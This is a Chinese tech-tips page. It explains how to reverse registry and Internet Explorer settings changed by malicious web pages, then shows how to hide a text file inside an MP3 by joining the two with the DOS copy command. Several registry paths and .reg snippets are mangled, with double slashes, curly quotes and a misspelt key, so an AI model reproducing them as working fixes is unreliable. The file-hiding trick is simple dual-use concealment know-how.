Win98/me系统:REGEDIT4[HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//Policies//System] "DisableRegistryTools"=dword:00000000将以上代码copy到记事本中, 取一个任意名字的。reg文件,比如recover.reg,双击运行可以解除你的锁定状态。注意:“REGEDIT4”一定要大写,并且它的后面一定要空一行,还有,“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃! HKEY_LOCAL_MACHINE//Software//Microsoft//Internet Explorer//Search//CustomizeSearch HKEY_LOCAL_MACHINE//Software//Microsoft//Internet Explorer//Search//SearchAssistant 8. 查看源文件“菜单被禁用 恶意网页修改了注册表,具体的位置为:(1)在注册表HKEY_CURRENT_USER//Software//Policies//Microsoft//Internet Explorer下建立子键”Restrictions“,然后在”Restrictions“下面建立两DWORD值:”NoViewSource“和”NoBrowserContextMenu“,并为这两个DWORD值赋值为”1“。 (2)在注册表 HKEY_USERS//.DEFAULT//Software//Policies//Microsoft//InternetExplorer//Restrictions下,将两个DWORD值:“NoViewSource”和“NoBrowserContextMenu”的键值都改为了“1”。第2点中提到的注册表其实相当于第1点中提到的注册表的分支,修改第1点中所说的注册表键值,第2点中注册表键值随之改变。 具体解决办法为:将以下内容另存为后缀名为reg的注册表文件,比方说unlock.reg,双击unlock.reg导入注册表,不用重启电脑 ,重新运行IE就会发现IE的功能恢复正常了。 REGEDIT4[HKEY_CURRENT_USER//Software//Policies//Microsoft//Internet Explorer //Restrictions]“NoViewSource”=dword:00000000 "NoBrowserContextMenu"=dword:00000000 [HKEY_USERS//.DEFAULT//Software//Policies//Microsoft//Internet Explorer //Restrictions]“NoViewSource”=dword:00000000“NoBrowserContextMenu”=dword:00000000 要特别注意的是,在你编制的注册表文件unlock.reg中,“REGEDIT4”一定要大写,并且它的后面一定要空一行,还有,“REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!许多朋友写注册表文件之所以不成功,就是因为没有注意到上面所说的内容,这回该注意点喽。请注意如果你是Win2000或WinXP用户,请将 “REGEDIT4”改为Windows Registry Editor Version 5.00. ★ 可以在IE中做一些设置以便永远不进恶意站点: 打开IE,点击“工具”→“Internet选项”→“内容”→“分级审查”,点“启用 ”按钮,会调出“分级审查”对话框,然后点击“许可站点”标签,输入不想去的网站网址,如输入:http://***.****.com,按“从不”按钮,再点击“确定”即大功告成! 9. IE不能打开新窗口的解决办法 (1.)点击“开始”→“运行”,在弹出的“运行”对话框中输入“regsvr32 actxprxy.dll”(注意输入时没有引号),然后点击“确定”按钮,接着会出现一个信息对话框“DllRegisterServer in actxprxy.dll succeeded”;在该对话框中点“确定”按钮;(2.)再次点击“开始”→“运行”,在弹出的“运行”对话框中输入“regsvr32 shdocvw.dll”(注意输入时没有引号),然后点击“确定”按钮,接着会出现一个信息对话框“DllRegisterServer in shdocvw.dll succeeded”,在该对话框中点“确定”按钮;(3.)重新启动Windows, 10. 右键功能失效 HKEY_CURRENT_USER/Software/Policies/Microsoft/Internet Explorer/Restrictions,将其DWORD值"NoBrowserContextMenu"的值改为0. 11. 篡改地址栏文字 解决办法:1.地址栏下的文字。在HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/ToolBar下找到键值LinksFolderName,将其中的内容删去即可。 2.地址栏中无用的地址。在HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypeURLs中删除无用的键值即可。 12. IE窗口定时弹出 点击"开始-运行-输入msconfig",选择"启动",把里面后缀为hta的都勾掉,重启。 13. 修改IE工具栏 对工具栏按钮点右键选“自定义”,在“当前工具栏按钮”下拉框中选定不需要的按钮后点击“删除”即可。 要去掉多余的地址列表:[HKEY_CURRENT_USERSoftwareWicrosoftInternet ExplorerTypeURLs]主键,将右部窗口中“url1”、“url2”等键值名全部删除即可。 要修复链接栏标题,首先展开[HKEY_CURRENT_USERSoftwareWicrosoftInternet ExplorerToolbar]主键,在右部窗口中对键值名“LinksFolderName”双击,修改其键值为欲显示的信息,或直接将该键值名删除,链接栏的标题将恢复为默认的“链接”字样。 恢复Internet选项卡:在“HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer”下在右边的窗口中找到一个二进制值“NoFolderOptions”,并设值为“00 00 00 00”。 桌面上的图标全部消失:HKEY_CURRENT_USER// Software//Microsoft//Windows// CurrentVersion//Policies//Explorer,找到“NoDesktop”值项,右键单击它,选择“修改”(或者干脆删除也可以),把它的值改为0,然后重新启动电脑。 | ||||||
用DOS下COPY命令打造秘密信息通道
(作者置顶)
机密信息的隐藏的最好办法是让他人根本想不到你在何处隐藏重要信息。即达到“出乎意料”效果。常用的DOS下COPY命令主要作用是复制文件。但大多数人都不清楚是它的另一个重要功能:将两个以上的文件合并成一个文件。在一般情况下,这是合并同一类型的文件。最常见的是两个文本类型文件的合并。当然也可以是两个互相独立的音视频文件合并。不过,换一种思路,用COPY命令合并两个不同类型的文件,比如一个音频类型文件,如MP3文件,一个是有着秘密信息的文本TXT文件。会发生什么?
示例是将所用的MP3文件1.mp3和隐藏有重要信息的文本文件pw.txt放在D盘的根目录下,通过命令行进入Windows的DOS窗口,切换当前目录到D盘,输入以下命令行:
copy 1.mp3 /b + pw.txt /a 2.mp3
上述的copy命令行参数意义一目了然:/b是以二进制方式复制合并文件;/a是以ASCII格式复制合并文件,即常用的文本方式。由于我们希望将重要信息隐藏在二进制文件中(如常见的音视频文件、可执行文件等),所以1.mp3应在前,文本格式的文件在其后,最后为前面两个所合成的新文件。如下图示:
图1此命令的最后结果是生成一个新MP3文件,用Windows自带的Mediaplayer播放,发现效果没有任何改变。为什么会这样呢?让我们继续追寻下去,用可查看二进制文件的编辑软件UltraEdit打开这个MP3文件,使用Ctrl+End组合键到此文件的尾部,呵呵,这不就是我们的pw.txt文件吗?
图2究其原因:DOS下的COPY命令是将被合并的两个文件简单的按照先后顺序以及各自指定的存储格式“加”起来,但在内容上不做处理。所以,如果我们想知道自己的机密信息,用任何一个文本编辑器去打开这个MP3文件到其文件尾部即可。
利用这种方法可以同样将我们的重要文件隐藏在视频文件、EXE文件以及JPEG和BMP等图像文件中。相比一些专业信息隐藏软件,这个方法可谓简单实用。